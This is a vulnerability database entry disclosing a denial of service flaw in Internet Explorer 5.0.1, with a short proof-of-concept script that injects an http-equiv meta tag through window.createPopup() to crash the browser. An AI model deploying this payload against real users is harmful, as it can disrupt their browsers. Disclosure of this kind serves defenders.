Microsoft Internet Explorer 5.0.1 http-equiv Meta Tag Denial of Service Vulnerability

ID SSV:77855
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


It has been reported that Internet Explorer is prone to a denial of service vulnerability when processing a malicious script containing the 'window.createPopup()' method to invoke the 'http-equiv' meta tag.

This issue could be exploited by a remote attacker to cause a denial of service condition in the browser.

<script type="text/javascript">
Wnd = window.createPopup();
Wnd.document.body.innerHTML='<meta http-equiv="imagetoolbar" content="no">';